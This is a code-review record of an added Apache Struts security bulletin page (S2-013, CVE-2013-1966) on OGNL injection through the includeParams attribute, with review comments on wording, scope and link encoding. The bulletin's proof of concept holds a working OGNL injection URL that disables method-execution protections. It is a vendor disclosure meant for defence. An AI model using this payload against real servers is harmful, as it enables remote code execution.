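Review bot: the scope given in the summary table of s2-012.html does not match the Problem and Solution sections. 'Affected Software' lists only 'Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13' and the summary calls this a Showcase app vulnerability, yet the Problem section says any unsanitized String variable exposed by an action and reused as a redirect parameter is evaluated a second time, and the Solution changes the OGNLUtil class and ships a corrected OGNL and XWork library. If the flaw is in the framework, the row should say so, so that teams who never deployed the showcase do not conclude they are unaffected. The range also stops at 2.3.13 while the recommended fix is 2.3.14.1, which leaves the status of 2.3.14 unstated. The Solution should also name what 'deny eval expressions by default' means for readers who cannot upgrade immediately. Smaller points: the struts.xml snippet is tagged 'code-java', 'need a redirect result' should be 'needs a redirect result', and the license comment URL reads 'LICENSE- 2.0' with a stray space.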

Added: websites/production/struts/content/release/2.3.x/docs/s2-013.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/s2-013.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/s2-013.html Sun May 26 21:38:59 2013
@@ -0,0 +1,237 @@
+
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+  <HEAD>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <STYLE type="text/css">
+      .dp-highlighter {
+        width:95% !important;
+      }
+    </STYLE>
+    <STYLE type="text/css">
+      .footer {
+        background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+        background-repeat:     repeat-x;
+        background-position:   left top;
+        padding-top:           4px;
+        color:                 #666;
+      }
+    </STYLE>
+    <SCRIPT type="text/javascript" language="javascript">
+      var hide = null;
+      var show = null;
+      var children = null;
+
+      function init() {
+        /* Search form initialization */
+        var form = document.forms['search'];
+        if (form != null) {
+          form.elements['domains'].value = location.hostname;
+          form.elements['sitesearch'].value = location.hostname;
+        }
+
+        /* Children initialization */
+        hide = document.getElementById('hide');
+        show = document.getElementById('show');
+        children = document.all != null ?
+                   document.all['children'] :
+                   document.getElementById('children');
+        if (children != null) {
+          children.style.display = 'none';
+          show.style.display = 'inline';
+          hide.style.display = 'none';
+        }
+      }
+
+      function showChildren() {
+        children.style.display = 'block';
+        show.style.display = 'none';
+        hide.style.display = 'inline';
+      }
+
+      function hideChildren() {
+        children.style.display = 'none';
+        show.style.display = 'inline';
+        hide.style.display = 'none';
+      }
+    </SCRIPT>
+    <TITLE>S2-013</TITLE>
+  <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+  <BODY onload="init()">
+    <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+      <TR class="topBar">
+        <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+          &nbsp;<A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A>&nbsp;&gt;&nbsp;<A href="home.html" title="Home">Home</A>&nbsp;&gt;&nbsp;<A href="security-bulletins.html" title="Security Bulletins">Security Bulletins</A>&nbsp;&gt;&nbsp;<A href="" title="S2-013">S2-013</A>
+        </TD>
+        <TD align="right" valign="middle" nowrap="">
+          <FORM name="search" action="http://www.google.com/search" method="get">
+            <INPUT type="hidden" name="ie" value="UTF-8">
+            <INPUT type="hidden" name="oe" value="UTF-8">
+            <INPUT type="hidden" name="domains" value="">
+            <INPUT type="hidden" name="sitesearch" value="">
+            <INPUT type="text" name="q" maxlength="255" value="">        
+            <INPUT type="submit" name="btnG" value="Google Search">
+          </FORM>
+        </TD>
+      </TR> 
+    </TABLE>
+
+    <DIV id="PageContent">
+      <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+        <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">S2-013</DIV>
+
+        <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+          <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">Edit Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">Add Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">Add News</A>
+        </DIV>
+      </DIV>
+
+      <DIV class="pagecontent">
+        <DIV class="wiki-content">
+          <H2><A name="S2-013-Summary"></A>Summary</H2>
+
+
+<P>A vulnerability, present in the <EM>includeParams</EM> attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command execution</P>
+
+
+<DIV class="table-wrap">
+<TABLE class="confluenceTable"><TBODY>
+<TR>
+<TH class="confluenceTh">Who should read this</TH>
+<TD class="confluenceTd">All Struts 2 developers</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Impact of vulnerability</TH>
+<TD class="confluenceTd">Remote command execution</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Maximum security rating</TH>
+<TD class="confluenceTd">High Critical</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Recommendation</TH>
+<TD class="confluenceTd">Developers should immediately upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Affected Software</TH>
+<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14 </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Reporter</TH>
+<TD class="confluenceTd"> The Struts Team </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">CVE Identifier</TH>
+<TD class="confluenceTd"><A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" class="external-link" rel="nofollow">CVE-2013-1966</A></TD>
+</TR>
+</TBODY></TABLE>
+</DIV>
+
+<H2><A name="S2-013-Problem"></A>Problem</H2>
+
+<P>Both the <A href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html" class="external-link" rel="nofollow"><EM>s:url</EM></A> and <A href="http://struts.apache.org/release/2.1.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html" class="external-link" rel="nofollow"><EM>s:a</EM></A> tag provide an <EM>includeParams</EM> attribute. </P>
+
+<P>The main scope of that attribute is to understand whether includes http request parameter or not.  </P>
+
+<P>The allowed values of includeParams are:</P>
+<OL>
+	<LI><EM>none</EM> - include no parameters in the URL (default)</LI>
+	<LI><EM>get</EM> - include only GET parameters in the URL</LI>
+	<LI><EM>all</EM> - include both GET and POST parameters in the URL</LI>
+</OL>
+
+
+<P>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <EM>URL</EM> or <EM>A</EM> tag , which will cause a further evaluation. </P>
+
+<P>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<BR>
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</P>
+
+<H2><A name="S2-013-Proofofconcept"></A>Proof of concept</H2>
+
+<OL>
+	<LI>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+ includeParams=<SPAN class="code-quote">&quot;all&quot;</SPAN>
+</PRE>
+</DIV></DIV>
+<P>Such that the line will be something look like this:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;s:url id=<SPAN class="code-quote">&quot;url&quot;</SPAN> action=<SPAN class="code-quote">&quot;HelloWorld&quot;</SPAN> includeParams=<SPAN class="code-quote">&quot;all&quot;</SPAN>&gt;</SPAN>
+</PRE>
+</DIV></DIV>
+<P>(it works also with <EM>includeParams=&quot;get&quot;</EM>).</P></LI>
+	<LI>Run struts2-blank app</LI>
+	<LI>Open the url: <A href="http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23writer.println('hacked'),%23writer.close())%7D" class="external-link" rel="nofollow">http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D</A><BR>
+ (this is the shortened version <A href="http://goo.gl/lhlTl" class="external-link" rel="nofollow">http://goo.gl/lhlTl</A>)</LI>
+</OL>
+
+
+<P>As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter. </P>
+
+<H2><A name="S2-013-Solution"></A>Solution</H2>
+
+<P>The OGNLUtil class was changed to deny eval expressions by default. </P>
+
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward Compatibility</B><BR>In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (<B>use it at your own risk</B>).
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;constant name=<SPAN class="code-quote">&quot;struts.ognl.enableOGNLEvalExpression&quot;</SPAN> value=<SPAN class="code-quote">&quot;true&quot;</SPAN> /&gt;</SPAN>
+</PRE>
+</DIV></DIV>
+<P>Please, ensure that:</P>
+<OL>
+	<LI>there are no <EM>includeParams</EM> with &quot;all&quot; or &quot;get&quot; value</LI>
+	<LI>every parameter which is declared inside the <EM>u</EM> or <EM>a</EM> tag come from a sanitized input.</LI>
+</OL>
+</TD></TR></TABLE></DIV>
+
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is strongly recommended to upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A>, which contains the corrected OGNL and XWork library.</B></TD></TR></TABLE></DIV>
+        </DIV>
+
+        
+      </DIV>
+    </DIV>
+    <DIV class="footer">
+      Generated by
+      <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+      <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+    </DIV>
+  </BODY>
+</HTML>
\ No newline at end of file
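
Review bot: In the Backward Compatibility note, the second checklist item names a tag that does not exist: "every parameter which is declared inside the <EM>u</EM> or <EM>a</EM> tag" should read <EM>url</EM>, matching the s:url tag named in the Problem section. This is the mitigation guidance for anyone who re-enables struts.ognl.enableOGNLEvalExpression, so it needs to be exact. Other points in the same file: the proof-of-concept link in step 3 has an href that leaves "@" and "," unencoded while its link text shows %40 and %2C, so the two should be made identical, and the goo.gl shortened link hides its destination and depends on a third-party service, so it is better removed from a security bulletin. The s:a API link points at release/2.1.x while the s:url link points at release/2.3.x. "High Critical" in the rating row is not a single rating and should be one value. The sentence "The main scope of that attribute is to understand whether includes http request parameter or not" does not say what the attribute controls; suggest stating that includeParams decides whether request parameters are copied into the generated URL. The exported page also carries the wiki's Edit Page / Add Page / Add News links (editpage.action, createpage.action, createblogpost.action) and a license header URL broken by a space ("LICENSE- 2.0"), both of which belong in a template fix rather than in the published bulletin.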